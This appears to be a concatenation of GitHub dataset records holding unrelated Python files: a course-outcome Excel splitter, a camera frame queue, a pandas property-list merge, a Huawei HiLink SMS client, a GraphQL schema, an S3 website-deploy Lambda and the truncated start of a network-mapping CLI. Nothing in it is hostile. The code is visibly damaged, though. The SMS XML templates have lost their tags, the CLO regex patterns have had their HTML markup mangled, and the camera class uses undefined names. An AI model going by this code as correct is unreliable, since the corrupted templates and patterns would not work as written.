https://www.binarystudy.com/2022/04/how-to-normalize-image-dataset-inpytorch.html\n \"\"\"\n images = next(iter(loader))\n # shape of images = [b,c,w,h]\n # returns mean, std \n return images.mean([0,2,3]), images.std([0,2,3])\n","repo_name":"stanipov/pytorch-diffusion","sub_path":"src/datasets/nebulae.py","file_name":"nebulae.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19900214581","text":"## Creates course assessment files for CAC purposes\n# Peter Ryan Nov 2018\n\nimport pandas as pd\nimport openpyxl\nfrom openpyxl.styles import Alignment\nimport sys\nimport re\nsys.path.append('c:\\\\Peter\\\\GitHub\\\\CoB\\\\')\n\n\ndef get_school_name(school_code):\n if school_code == '610P':\n return 'CPO'\n if school_code == '615H':\n return 'ACCT'\n if school_code == '620H':\n return 'BITL'\n if school_code == '625H':\n return 'EFM'\n if school_code == '630H':\n return 'MGT'\n if school_code == '650T':\n return 'VBE'\n if school_code == '660H':\n return 'GSBL'\n if school_code == 'VN':\n return 'SBM'\n return None\n\n\ndef cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\ndef get_CLOs(text, cid=None):\n try:\n if '
\n  • ' in text or '\n  • ' in text:\n        CLOs = re.split('\n  • |\n  • |CLO|\n\n    |\n\n    |\n    |\n    |', text)\n        if len(CLOs) == 1:\n            CLOs = re.split('\n  • |\n  • |\n    |\n    |\n\n    |\n\n    |\n    |\n\n    |\n    |CLO', text)\n        \n        CLOs_2 = []\n        for clo in CLOs:\n            clo = clo.replace('\n
    ', '\n')\n            clo = cleanhtml(clo)\n            try:\n                clo = clo.strip()\n                clo = clo.rstrip()\n                clo = clo.strip('-')\n                clo = clo.strip('•')\n                clo = clo.strip('*')\n                clo = clo.strip('1')\n                clo = clo.strip('2')\n                clo = clo.strip('3')\n                clo = clo.strip('4')\n                clo = clo.strip('5')\n                clo = clo.strip('6')\n                clo = clo.strip('7')\n                clo = clo.strip('8')\n                clo = clo.strip('9')\n                clo = clo.strip('0')\n                clo = clo.strip('.')\n                if clo.startswith(\":\"):\n                    clo = clo[1:]\n                clo = clo.strip(')')\n                clo = clo.strip('\uf0a7')\n                clo = clo.strip()\n            except: pass\n            \n            if len(clo) > 10:\n                CLOs_2.append(clo)\n\n    else:\n        NotOKlist = ['\n\n    ', '\n\n    ', '\n    ', '\n    ', '\n    ', '\n    ', '\n    ','CLO']\n        if any(s in text for s in NotOKlist):\n            CLOs = re.split('\n    |\n    |\n\n    |\n\n    |\n    |CLO|\n\n    |\n    ', text)\n        else:\n            return [text]\n        CLOs_2 = []\n        for clo in CLOs:\n            clo = clo.replace('\n
    ', '\\n')\n clo = cleanhtml(clo)\n try:\n clo = clo.strip()\n clo = clo.rstrip()\n clo = clo.strip('-')\n clo = clo.strip('•')\n clo = clo.strip('*')\n clo = clo.strip('1')\n clo = clo.strip('2')\n clo = clo.strip('3')\n clo = clo.strip('4')\n clo = clo.strip('5')\n clo = clo.strip('6')\n clo = clo.strip('7')\n clo = clo.strip('8')\n clo = clo.strip('9')\n clo = clo.strip('0')\n clo = clo.strip('.')\n if clo.startswith(\":\"):\n clo = clo[1:]\n clo = clo.strip(')')\n clo = clo.strip('\\uf0a7')\n clo = clo.strip()\n except Exception as e:\n print(cid)\n print(e)\n pass\n \n if len(clo) > 10:\n CLOs_2.append(clo)\n\n if len(CLOs_2) == 1:\n return CLOs_2\n \n while ':' in CLOs_2[0][-4:]:\n CLOs_2 = CLOs_2[1:]\n \n while 'Learning Outcomes' in CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n\n if 'Learning outcomes' in CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n \n if 'learning outcomes' in CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n \n if 'completion of this course' in CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n\n if 'Enabling Knowledge and Skills for Capabilities' in CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n \n if 'engage in activities leading to an understanding of\\n' == CLOs_2[0]:\n CLOs_2 = CLOs_2[1:]\n \n return CLOs_2\n \n except Exception as e:\n print(cid)\n print(e)\n print(text, '\\n')\n return['']\n\n# open template\ndirectory = 'H:\\\\Projects\\\\CoB\\\\Program Transformation\\\\CLO mapping\\\\Success\\\\'\nclo_filename = 'CLOs_cob_success.xlsx'\ntemplate = 'CLO_template_success.xlsx'\nsavefile = 'CLOs_cob_success_2_extra.xlsx'\n\n\n# open template\nwb = openpyxl.load_workbook(directory+template)\n\n\n# fill CLOs worksheet\nclo_df = pd.read_excel(open(directory+clo_filename, 'rb'), converters={'Course ID': str})\n\n\nclo_ws = wb.active\n\nj = 2\nfor i, r in clo_df.iterrows():\n CLO_list = []\n CLO_list = get_CLOs(r['Learning Outcomes'], r['Course ID'])\n k = 1\n for clo in CLO_list:\n clo_ws.cell(row=j, column=1).value = r['Course ID']\n clo_ws.cell(row=j, column=2).value = r['Course Title']\n clo_ws.cell(row=j, column=3).value = r['School ID']\n clo_ws.cell(row=j, column=4).value = get_school_name(r['School ID'])\n clo_ws.cell(row=j, column=5).value = 'CLO{}'.format(k)\n clo_ws.cell(row=j, column=6).alignment = Alignment(wrapText=True)\n clo_ws.cell(row=j, column=6).value = clo\n clo_ws.cell(row=j, column=7).value = r['Version']\n clo_ws.cell(row=j, column=8).value = r['Status']\n clo_ws.cell(row=j, column=9).value = r['Publish/Unpublish Time']\n j += 1\n k += 1\nwb.save(directory+savefile)\n\n\n\n","repo_name":"pjryan356/CoB","sub_path":"PLO alignment/CLO_separation.py","file_name":"CLO_separation.py","file_ext":"py","file_size_in_byte":4987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32397978784","text":"import threading\nimport binascii\nfrom time import sleep\nimport utils as u\n\n\nclass Camera(object):\n def __init__(self, makeup_artist):\n self.to_process = []\n self.to_output = []\n\n thread = threading.Thread(target=self.keep_processing, args=())\n thread.daemon = True\n thread.start()\n print(\"[INFO] camera initialized\")\n\n def process_one(self):\n if not self.to_process:\n return\n\n # input is an ascii string. 
\n input_str = self.to_process.pop(0)\n\n # convert it to a pil image\n input_img = u.base64_to_cv(input_str)\n\n ################## where the hard work is done ############\n # output_img is an PIL image\n output_img = self.makeup_artist.apply_makeup(input_img)\n\n # output_str is a base64 string in ascii\n output_str = pil_image_to_base64(output_img)\n\n # convert eh base64 string in ascii to base64 string in _bytes_\n self.to_output.append(binascii.a2b_base64(output_str))\n\n def capture(self, id):\n frame = self.get_frame()\n timestamp = strftime(\"%d-%m-%Y-%Hh%Mm%Ss\", localtime())\n path = Camera.CAPTURES_DIR + str(id) + \"/\"\n if os.path.exists(path):\n pass\n else:\n os.mkdir(path)\n no = len(os.listdir(path))\n filename = path + str(no) +\".jpg\"\n\n print(\"[INFO] FILENAME :\", filename)\n print(\"[INFO] size : \", type(frame))\n\n if not cv.imwrite(filename, frame):\n raise RuntimeError(\"Unable to capture image \"+timestamp)\n return timestamp\n\n def keep_processing(self):\n while True:\n self.process_one()\n sleep(0.01)\n\n def enqueue_input(self, input):\n self.to_process.append(input)\n\n def get_frame(self):\n while not self.to_output:\n sleep(0.05)\n return self.to_output.pop(0)","repo_name":"aditya-29/contactless_attendance","sub_path":"webpage/camera_socket.py","file_name":"camera_socket.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71267641381","text":"# Importing dependencies\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\n# Loading all files into a dataframe\r\nold_sov = pd.read_excel(\"../SOVs/Final SOV Uploaded to Origami 12-10 - Includes MDS.xlsx\")\r\nsov = pd.read_excel(\"Overlay_SOVs.xlsx\")\r\nQ1 = pd.read_excel(\"../Q_Data_Revanatge/Q1'20 US Master Property List_vF_Hardcoded.xlsx\", skiprows=9)\r\nmds = pd.read_excel(\"../Origami_locations/Added Column - Origami Locations - 7-9-20.xlsx\")\r\npossible = pd.read_excel(\"Possibel Matches (1).xlsx\")\r\n\r\n# Data Cleaning and Address normalization functions\r\ndef replace_last(source_string, replace_what, replace_with):\r\n head, _sep, tail = source_string.rpartition(replace_what)\r\n return head + replace_with + tail\r\n \r\ndef replace_second(source_string, dict_):\r\n s = source_string.split(' ')\r\n if len(s) >1 :\r\n if s[1].replace('.', '').lower() in dict_.keys():\r\n s[1] = dict_[s[1].replace('.', '')]\r\n return ' '.join(s)\r\n else: \r\n return source_string\r\n else:\r\n return source_string\r\n\r\n#def similar(a, b):\r\n #return SequenceMatcher(None, a, b).ratio()\r\n\r\n\"\"\" Retained columns from each file\r\n=====================================================================================================================\"\"\"\r\n\r\nretainedCols = ['Address_Line_1','Address_Line_2', 'City', 'possibleMatches SOV 12-10', 'possibleMatches Q1 2020', 'possibleMatches Origami Locations 7-9-20' ]\r\n\r\nsov_cols = ['index', 'Business_ID','Location',\t'Property_ID',\t'Property',\t'Portfolio_Company_ID',\t'Portfolio_Company',\t\r\n 'Fund',\t'Investment',\t'Occupancy_Asset_Class',\t'Legal_Entity',\t'Main_Insurance_Portfolio',\t\r\n 'Normalized_Construction_Type',\t'Normalized_Occupancy',\t'Latitude',\t'Longitude']\r\n\r\nmds_cols = ['index', 'BusinessID',\t'Name', 'Legal Entity',\t'Investment','Fund', 'Portfolio Company']\r\nQ1_cols = ['index','Property MDM ID',\t'Fund',\t'Investment Deal', 'Portfolio Company',\t'Property Name','Sector']\r\n\r\n\r\n# drop dups\r\npossible = 
possible.drop_duplicates(subset=['Address_Line_1','Address_Line_2', 'City'])\r\n\r\n# Overlaying sov and manual ross mapping with the possible matches \r\nmerg1 = pd.merge(sov,possible[retainedCols], on=['Address_Line_1','Address_Line_2', 'City'], how='left', validate = 'm:1')\r\nmerg1['sov_indexs'] = merg1['possibleMatches SOV 12-10'].apply(lambda x : int(x.split(' ')[0]) if (x != '' and not isinstance(x, float) and not isinstance(x, int)) else x)\r\nmerg1['Q1_indexs'] = merg1['possibleMatches Q1 2020'].apply(lambda x : int(x.split(' ')[0]) if (x != '' and not isinstance(x, float) and not isinstance(x, int)) else x)\r\nmerg1['mds_indexs'] = merg1['possibleMatches Origami Locations 7-9-20'].apply(lambda x : int(x.split(' ')[0]) if (x != '' and not isinstance(x, float) and not isinstance(x, int)) else x)\r\n\r\n# Creating an index to merge the data on\r\nold_sov.index +=2\r\nold_sov.reset_index(inplace=True)\r\n# Merging the entire overlay with the old SOV to pull all manually mapped columns\r\nmerge_sov = pd.merge(merg1,old_sov[sov_cols], how='left', left_on='sov_indexs', right_on='index', validate = 'm:1', suffixes=('','_sov'))\r\n\r\n\r\nsov_cols.remove('index')\r\n# updating all the columns from the new pulled columns \r\nfor col in sov_cols:\r\n try:\r\n merge_sov[f'{col}'] = np.where(pd.notnull(merge_sov[f'{col}_sov']), merge_sov[f'{col}_sov'], merge_sov[f'{col}'])\r\n except Exception as e: print(e)\r\n\r\n# Adding an index to Q1 and performing the merge and the update\r\nQ1.index +=11\r\nQ1.reset_index(inplace=True) \r\nmeregeQ1 = pd.merge(merge_sov,Q1[Q1_cols], how='left', left_on='Q1_indexs', right_on='index', validate = 'm:1', suffixes=('','_Q1'))\r\nmeregeQ1['Business_ID'] = np.where(pd.notnull(meregeQ1['Property MDM ID']), meregeQ1['Property MDM ID'], meregeQ1['Business_ID'])\r\nmeregeQ1['Fund'] = np.where(pd.notnull(meregeQ1['Fund_Q1']), meregeQ1['Fund_Q1'], meregeQ1['Fund'])\r\nmeregeQ1['Investment'] = np.where(pd.notnull(meregeQ1['Investment Deal']), meregeQ1['Investment Deal'], meregeQ1['Investment'])\r\nmeregeQ1['Property'] = np.where(pd.notnull(meregeQ1['Property Name']), meregeQ1['Property Name'], meregeQ1['Property'])\r\nmeregeQ1['Occupancy_Asset_Class'] = np.where(pd.notnull(meregeQ1['Sector']), meregeQ1['Sector'], meregeQ1['Occupancy_Asset_Class'])\r\nmeregeQ1['Portfolio_Company'] = np.where(pd.notnull(meregeQ1['Portfolio Company']), meregeQ1['Portfolio Company'], meregeQ1['Portfolio_Company'])\r\n\r\n# Adding an index to MDS and performing the merge and the update\r\nmds.index +=2\r\nmds.reset_index(inplace=True) \r\n\r\nfinal = pd.merge(meregeQ1,mds[mds_cols], how='left', left_on='mds_indexs', right_on='index', validate = 'm:1', suffixes=('', '_mds'))\r\nfinal['Business_ID'] = np.where(pd.notnull(final['BusinessID']), final['BusinessID'], final['Business_ID'])\r\nfinal['Location'] = np.where(pd.notnull(final['Name']), final['Name'], final['Location'])\r\nfinal['Investment'] = np.where(pd.notnull(final['Investment_mds']), final['Investment_mds'], final['Investment'])\r\nfinal['Legal_Entity'] = np.where(pd.notnull(final['Legal Entity']), final['Legal Entity'], final['Legal_Entity'])\r\nfinal['Portfolio_Company'] = np.where(pd.notnull(final['Portfolio Company_mds']), final['Portfolio Company_mds'], final['Portfolio_Company'])\r\nfinal['Fund'] = np.where(pd.notnull(final['Fund_mds']), final['Fund_mds'], final['Fund'])\r\n\r\nprint(len(final))\r\n\r\n# Writing the final results to an excel file\r\n#final[sov.columns.to_list()].to_excel('Test_07-14.xlsx', 
index=False)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"cheikhsidi/Diverse-Scripts","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14345886467","text":"import contextlib\nimport httpx\nimport xmltodict as xmltodict\n\nfrom datetime import datetime\nfrom typing import List\nfrom httpx import Client\nfrom pydantic import HttpUrl\n\nSMS_LIST_TEMPLATE = \"\"\"\n 1\n 20\n 1\n 0\n 0\n 0\n \"\"\"\n\nSMS_DEL_TEMPLATE = \"\"\"\n {index}\n \"\"\"\n\nSMS_SEND_TEMPLATE = \"\"\"\n -1\n {phone}\n \n {content}\n {length}\n 1\n {timestamp}\n \"\"\"\n\n\ndef is_hilink(device_host: HttpUrl) -> bool:\n with Client(base_url=device_host) as client:\n try:\n response = client.get(\"/api/device/information\", timeout=2.0)\n except httpx.ConnectTimeout as err:\n return False\n\n if response.status_code != 200:\n return False\n\n return True\n\n\ndef get_headers(device_host: HttpUrl) -> dict:\n token = None\n session_id = None\n\n with Client(base_url=device_host) as client:\n try:\n response = client.get(\"/api/webserver/SesTokInfo\")\n except httpx.ConnectTimeout as err:\n return {}\n\n if response.status_code != 200:\n return {'__RequestVerificationToken': token, 'Cookie': session_id}\n\n with contextlib.suppress(Exception):\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n if 'response' in response_data and 'TokInfo' in response_data[\"response\"]:\n token = response_data['response']['TokInfo']\n\n if 'response' in response_data and 'SesInfo' in response_data['response']:\n session_id = response_data['response']['SesInfo']\n\n headers = {'__RequestVerificationToken': token, 'Cookie': session_id}\n\n return headers\n\n\ndef get_sms(device_host: HttpUrl, headers: dict):\n payload = SMS_LIST_TEMPLATE\n\n with Client(base_url=device_host) as client:\n try:\n response = client.post(\"/api/sms/sms-list\", data=payload, headers=headers)\n except httpx.ConnectTimeout as err:\n pass\n\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n num_messages = int(response_data['response']['Count'])\n messages_r = response_data['response']['Messages']['Message']\n\n if num_messages == 1:\n temp = messages_r\n messages_r = [temp]\n\n messages = get_content(messages_r, num_messages)\n return messages, messages_r\n\n\ndef get_content(data, num_messages) -> List[str]:\n messages = []\n for i in range(num_messages):\n message = data[i]\n number = message['Phone']\n content = message['Content']\n date = message['Date']\n messages.append('Message from ' + number + ' recieved ' + date + ' : ' + str(content))\n\n return messages\n\n\ndef del_message(device_host: HttpUrl, headers: dict, index: int) -> None:\n payload = SMS_DEL_TEMPLATE.format(index=index)\n\n with Client(base_url=device_host) as client:\n try:\n response = client.post(\"/api/sms/delete-sms\", data=payload, headers=headers)\n except httpx.ConnectTimeout as err:\n pass\n\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n print(response_data['response'])\n\n\ndef get_unread(device_host: HttpUrl, headers: dict) -> int:\n with Client(base_url=device_host) as client:\n try:\n response = client.get(\"/api/monitoring/check-notifications\", headers=headers)\n except httpx.ConnectTimeout as err:\n return False\n\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n unread = int(response_data['response']['UnreadMessage'])\n\n return unread\n\n\ndef 
wait_send_sms_to_phone(device_host: HttpUrl, phone_number: str) -> bool:\n with Client(base_url=device_host) as client:\n try:\n response = client.get(\"/api/sms/send-status\")\n except httpx.ConnectTimeout as err:\n return False\n\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n phone = response_data[\"response\"][\"Phone\"]\n phone_success = response_data[\"response\"][\"SucPhone\"]\n phone_fail = response_data[\"response\"][\"FailPhone\"]\n total_count = response_data[\"response\"][\"TotalCount\"]\n current_index = response_data[\"response\"][\"CurIndex\"]\n\n if phone and phone != phone_number:\n return False\n if phone_success and phone_success != phone_number:\n return False\n if phone_fail and phone_fail == phone_number:\n return False\n\n if current_index < total_count:\n return False\n\n return True\n\n\ndef send_sms_to_phone(device_host: HttpUrl, phone: str, message: str) -> bool:\n payload = SMS_SEND_TEMPLATE.format(\n phone=phone,\n content=message,\n length=len(message),\n timestamp=datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n )\n\n with Client(base_url=device_host) as client:\n try:\n response = client.post(\"/api/sms/send-sms\", data=payload)\n if response.status_code != 200:\n return False\n\n response_data = xmltodict.parse(response.text, xml_attribs=True)\n\n return response_data[\"response\"] == \"OK\"\n\n except httpx.ConnectTimeout as err:\n return False\n","repo_name":"jadjer/rideonline_sms","sub_path":"app/services/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"28141957631","text":"import strawberry\nfrom strawberry_django_plus import gql\nfrom strawberry_django_plus.optimizer import DjangoOptimizerExtension\nfrom typing import List, Optional\n\nfrom strawberry_django_plus.relay import GlobalID\n\nfrom company import types, models\n\n\n@gql.django.input(models.Company)\nclass CompanyInput:\n name: gql.auto\n\n\n@gql.django.partial(models.Company)\nclass CompanyInputPartial(gql.NodeInput):\n name: gql.auto\n\n\n@gql.django.input(models.Employee)\nclass EmployeeInput:\n first_name: gql.auto\n last_name: gql.auto\n company: gql.auto\n projects: gql.auto\n\n\n@gql.django.partial(models.Employee)\nclass EmployeeInputPartial(gql.NodeInput):\n first_name: gql.auto\n last_name: gql.auto\n company: gql.auto\n projects: gql.auto\n\n\n@gql.django.input(models.Project)\nclass ProjectInput:\n type: gql.auto\n duration_hours: gql.auto\n # TODO: Ask Albert how to write proper lists queries + how it should be implemented on api side\n employees: List[EmployeeInput]\n\n\n@gql.django.partial(models.Project)\nclass ProjectInputPartial(gql.NodeInput):\n type: gql.auto\n duration_hours: gql.auto\n employees: gql.auto\n\n\n@gql.type\nclass Query:\n companies: List[types.Company] = gql.django.field()\n employees: List[types.Employee] = gql.django.field()\n projects: List[types.Project] = gql.django.field()\n\n\n@gql.type\nclass Mutation:\n # !IMPORTANT : ID FIELD NEEDS TO BE ALWAYS ENCODED TO BASE64\n # For example Company:1 == Q29tcGFueTox\n\n \"\"\"\n mutation {\n createCompany(input: {name: \"First Company\"}) {\n ... on Company {\n name\n }\n }\n }\n \"\"\"\n create_company: types.Company = gql.django.create_mutation(CompanyInput)\n\n \"\"\"\n mutation {\n updateCompany(input: {id: \"Q29tcGFueTox\", name: \"First Name Changed\"}) {\n ... 
on Company {\n name\n }\n }\n }\n \"\"\"\n update_company: types.Company = gql.django.update_mutation(CompanyInputPartial)\n delete_company: types.Company = gql.django.delete_mutation(gql.NodeInput)\n \"\"\"\n mutation {\n createEmployee(input: {firstName: \"Dawid\", lastName: \"Adamski\", company: {id: \"Q29tcGFueTox\"}}) {\n ... on Employee {\n firstName\n }\n }\n }\n \"\"\"\n create_employee: types.Employee = gql.django.create_mutation(EmployeeInput)\n update_employee: types.Employee = gql.django.update_mutation(EmployeeInputPartial)\n delete_employee: types.Employee = gql.django.delete_mutation(gql.NodeInput)\n\n create_project: types.Project = gql.django.create_mutation(ProjectInput)\n update_project: types.Project = gql.django.update_mutation(ProjectInputPartial)\n delete_project: types.Project = gql.django.delete_mutation(gql.NodeInput)\n\n\nschema = strawberry.Schema(query=Query, mutation=Mutation, extensions=[DjangoOptimizerExtension])\n","repo_name":"Lok3rs/django_react_graphql","sub_path":"api/company/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37324364003","text":"import boto3\nimport json\nimport logging\nimport os\nfrom urllib.request import build_opener, HTTPHandler, Request\n\n\nLOGGER = logging.getLogger()\nLOGGER.setLevel(logging.INFO)\n\ns3 = boto3.resource('s3')\ns3_client = boto3.client('s3')\n\nreplace_env_variables = False\n\n\ndef send_response(event, context, response_status, response_data):\n \"\"\"\n Send a resource manipulation status response to CloudFormation\n \"\"\"\n response_body = json.dumps({\n \"Status\": response_status,\n \"Reason\": \"See the details in CloudWatch Log Stream: \" + context.log_stream_name,\n \"PhysicalResourceId\": context.log_stream_name,\n \"StackId\": event['StackId'],\n \"RequestId\": event['RequestId'],\n \"LogicalResourceId\": event['LogicalResourceId'],\n \"Data\": response_data\n })\n\n LOGGER.info('ResponseURL: {s}'.format(s=event['ResponseURL']))\n LOGGER.info('ResponseBody: {s}'.format(s=response_body))\n\n opener = build_opener(HTTPHandler)\n request = Request(event['ResponseURL'], data=response_body.encode('utf-8'))\n request.add_header('Content-Type', '')\n request.add_header('Content-Length', len(response_body))\n request.get_method = lambda: 'PUT'\n response = opener.open(request)\n LOGGER.info(\"Status code: {s}\".format(s=response.getcode))\n LOGGER.info(\"Status message: {s}\".format(s=response.msg))\n\n\ndef write_to_s3(event, context, bucket, key, body):\n try:\n s3_client.put_object(Bucket=bucket, Key=key, Body=body)\n except Exception as e:\n LOGGER.info('Unable to write file to s3: {e}'.format(e=e))\n send_response(event, context, \"FAILED\",\n {\"Message\": \"Failed to write file to s3 after variable replacement\"})\n else:\n LOGGER.info('Wrote file back to s3 after variable replacement')\n\n\ndef read_from_s3(event, context, bucket, key):\n try:\n obj = s3_client.get_object(\n Bucket=bucket,\n Key=key\n )\n except Exception as e:\n LOGGER.info(\n 'Unable to read key: {key} in from s3 bucket: {bucket}. 
Error: {e}'.format(e=e, key=key, bucket=bucket))\n send_response(event, context, \"FAILED\",\n {\"Message\": \"Failed to read file from s3\"})\n else:\n results = obj['Body'].read().decode('utf-8')\n return results\n\n\ndef copy_source(event, context):\n try:\n source_bucket = event[\"ResourceProperties\"][\"WebsiteCodeBucket\"]\n source_key = event[\"ResourceProperties\"][\"WebsiteCodePrefix\"]\n website_bucket = event[\"ResourceProperties\"][\"DeploymentBucket\"].split('.')[0]\n except KeyError as e:\n LOGGER.info(\"Failed to retrieve required values from the CloudFormation event: {e}\".format(e=e))\n send_response(event, context, \"FAILED\", {\"Message\": \"Failed to retrieve required values from the CloudFormation event\"})\n else:\n try:\n LOGGER.info(\"Checking if custom environment variables are present\")\n\n try:\n FileManagerAPIEndpoint = os.environ['FileManagerAPIEndpoint']\n region = os.environ['AwsRegion']\n user_pool_id = os.environ['UserPoolId']\n client_id = os.environ['PoolClientId']\n identity_id = os.environ['IdentityPoolId']\n except KeyError:\n replace_env_variables = False\n else:\n new_variables = {\"fileManagerApiUrl\": FileManagerAPIEndpoint, \"awsRegion\": region,\n \"userPoolId\": user_pool_id, \"userPoolIdClientId\": client_id, \"identityPoolId\": identity_id}\n\n replace_env_variables = True\n LOGGER.info(\n \"New variables: {v}\".format(v=new_variables))\n\n deployment_bucket = s3.Bucket(website_bucket)\n\n with open('./webapp-manifest.json') as file:\n manifest = json.load(file)\n print('UPLOADING FILES::')\n for key in manifest:\n print('s3://'+source_bucket+'/'+source_key+'/'+key)\n copy_source = {\n 'Bucket': source_bucket,\n 'Key': source_key+'/'+key\n }\n s3.meta.client.copy(copy_source, website_bucket, key)\n if replace_env_variables is True and key == \"runtimeConfig.json\":\n LOGGER.info(\"updating runtimeConfig.json\")\n write_to_s3(event, context, website_bucket, key, json.dumps(new_variables))\n\n except Exception as e:\n LOGGER.info(\"Unable to copy website source code into the website bucket: {e}\".format(e=e))\n send_response(event, context, \"FAILED\", {\"Message\": \"Unexpected event received from CloudFormation\"})\n else:\n send_response(event, context, \"SUCCESS\",\n {\"Message\": \"Resource creation successful!\"})\n\n\ndef lambda_handler(event, context):\n \"\"\"\n Handle Lambda event from AWS\n \"\"\"\n try:\n LOGGER.info('REQUEST RECEIVED:\\n {s}'.format(s=event))\n LOGGER.info('REQUEST RECEIVED:\\n {s}'.format(s=context))\n if event['RequestType'] == 'Create':\n LOGGER.info('CREATE!')\n copy_source(event, context)\n elif event['RequestType'] == 'Update':\n LOGGER.info('UPDATE!')\n copy_source(event, context)\n elif event['RequestType'] == 'Delete':\n LOGGER.info('DELETE!')\n send_response(event, context, \"SUCCESS\",\n {\"Message\": \"Resource deletion successful!\"})\n else:\n LOGGER.info('FAILED!')\n send_response(event, context, \"FAILED\", {\"Message\": \"Unexpected event received from CloudFormation\"})\n except Exception as e:\n LOGGER.info('FAILED!')\n send_response(event, context, \"FAILED\", {\"Message\": \"Exception during processing: {e}\".format(e=e)})","repo_name":"aws-solutions/simple-file-manager-for-amazon-efs","sub_path":"source/helper/website_helper.py","file_name":"website_helper.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"35"} +{"seq_id":"11307781523","text":"import sys\nimport getopt\nimport datetime\nimport os\n\nimport 
mnetsuite\n\ndef print_syntax():\n\tprint('Usage:\\n'\n\t\t\t' mnet.py graph -r \\n'\n\t\t\t' -f \\n'\n\t\t\t' [-d ]\\n'\n\t\t\t' [-c ]\\n'\n\t\t\t' [-t ]\\n'\n\t\t\t' [-C ]\\n'\n\t\t\t'\\n'\n\t\t\t' mnet.py tracemac -r \\n'\n\t\t\t' -m \\n'\n\t\t\t' [-c ]\\n'\n\t\t\t'\\n'\n\t\t\t' mnet.py config\\n'\n\t\t)\n\n\ndef print_banner():\n\tprint('MNet Suite v%s' % mnetsuite.__version__)\n\tprint('Written by Michael Laforest ')\n\tprint('')\n\n\ndef main(argv):\n\topt_root_ip = None\n\tif (len(argv) < 1):\n\t\tprint_banner()\n\t\tprint_syntax()\n\t\treturn\n\n\tmod = argv[0]\n\tif (mod == 'graph'):\n\t\tprint_banner()\n\t\tgraph(argv[1:])\n\telif (mod == 'tracemac'):\n\t\tprint_banner()\n\t\ttracemac(argv[1:])\n\telif (mod == 'config'):\n\t\tgenerate_config()\n\telse:\n\t\tprint_banner()\n\t\tprint_syntax()\n\n\ndef graph(argv):\n\tmax_depth = 0\n\n\tgraph = mnetsuite.mnet_graph()\n\n\topt_dot = None\n\topt_depth = 0\n\topt_title = 'MNet Network Diagram'\n\topt_conf = './mnet.conf'\n\topt_catalog = None\n\n\ttry:\n\t\topts, args = getopt.getopt(argv, 'f:d:r:t:F:c:C:')\n\texcept getopt.GetoptError:\n\t\tprint_syntax()\n\t\tsys.exit(1)\n\tfor opt, arg in opts:\n\t\tif (opt == '-r'):\n\t\t\topt_root_ip = arg\n\t\tif (opt == '-f'):\n\t\t\topt_dot = arg\n\t\tif (opt == '-d'):\n\t\t\topt_depth = int(arg)\n\t\t\tmax_depth = int(arg)\n\t\tif (opt == '-t'):\n\t\t\topt_title = arg\n\t\tif (opt == '-c'):\n\t\t\topt_conf = arg\n\t\tif (opt == '-C'):\n\t\t\topt_catalog = arg\n\n\tif ((opt_root_ip == None) | (opt_dot == None)):\n\t\tprint_syntax()\n\t\tprint('Invalid arguments.')\n\t\treturn\n\n\tprint(' Config file: %s' % opt_conf)\n\tprint(' Root node: %s' % opt_root_ip)\n\tprint(' Output file: %s' % opt_dot)\n\tprint(' Crawl depth: %s' % opt_depth)\n\tprint(' Diagram title: %s' % opt_title)\n\tprint('Out Catalog file: %s' % opt_catalog)\n\n\tprint('\\n\\n')\n\n\t# load the config\n\tif (graph.load_config(opt_conf) == 0):\n\t\treturn\n\tgraph.set_max_depth(opt_depth)\n\n\t# start\n\tgraph.crawl(opt_root_ip)\n\t\t\n\t# outputs\n\tgraph.output_stdout()\n\n\tif (opt_dot != None):\n\t\tgraph.output_dot(opt_dot, opt_title)\n\n\tif (opt_catalog != None):\n\t\tgraph.output_catalog(opt_catalog)\n\n\ndef tracemac(argv):\n\ttrace = mnetsuite.mnet_tracemac()\n\n\topt_root_ip = None\n\topt_conf = './mnet.conf'\n\topt_mac = None\n\n\ttry:\n\t\topts, args = getopt.getopt(argv, 'r:c:m:')\n\texcept getopt.GetoptError:\n\t\tprint_syntax()\n\t\treturn\n\tfor opt, arg in opts:\n\t\tif (opt == '-r'):\n\t\t\topt_root_ip = arg\n\t\tif (opt == '-c'):\n\t\t\topt_conf = arg\n\t\tif (opt == '-m'):\n\t\t\topt_mac = arg\n\n\tif ((opt_root_ip == None) | (opt_mac == None)):\n\t\tprint_syntax()\n\t\tprint('Invalid arguments.')\n\t\treturn\n\n\tprint(' Config file: %s' % opt_conf)\n\tprint(' Root node: %s' % opt_root_ip)\n\tprint(' MAC address: %s' % opt_mac)\n\n\tprint('\\n\\n')\n\n\tmac = trace.parse_mac(opt_mac)\n\tif (mac == None):\n\t\tprint('MAC address is invalid.')\n\t\treturn\n\n\t# load config\n\ttrace.load_config(opt_conf)\n\n\t# start\n\tprint('Start 